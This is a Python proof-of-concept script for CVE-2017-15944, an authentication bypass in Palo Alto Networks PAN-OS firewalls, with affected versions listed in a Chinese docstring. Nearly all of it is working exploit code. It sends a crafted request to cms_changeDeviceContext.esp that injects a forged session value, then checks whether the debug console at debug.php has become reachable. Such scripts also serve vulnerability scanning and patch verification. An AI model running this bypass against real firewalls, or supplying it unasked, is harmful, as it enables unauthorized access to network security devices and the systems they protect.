Test

#!/usr/bin/python
#-*- encoding: utf-8 -*-
# Author: am4zing
# Date: 2018-08-10 14:31:58
# Project: https://github.com/yizhimanpadewoniu

"""
Palo Alto Network Firework CVE-2017-15944

影响版本：
PAN-OS 6.1.18 and earlier 
PAN-OS 7.0.18 and earlier
PAN-OS 7.1.13 and earlier
PAN-OS 8.0.5 and earlier
"""

import requests
from termcolor import cprint


def poc(url):
    try:
        create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(url)
        verify_url = '{}/php/utils/debug.php'.format(url)
        session = requests.Session()
        if 'https' in url:
            session.get(verify_url, verify=False)
            session.get(create_session_url, verify=False)
            verify = session.get(verify_url, verify=False)
        else:
            session.get(verify_url)
            session.get(create_session_url)
            verify = session.get(verify_url)

        if 'Debug Console' in verify.text:
            return '[CVE-2017-15944]' + url
        else:
            return False
    except Exception:
        return cprint('[Somethin wrong:] ' + url, 'red')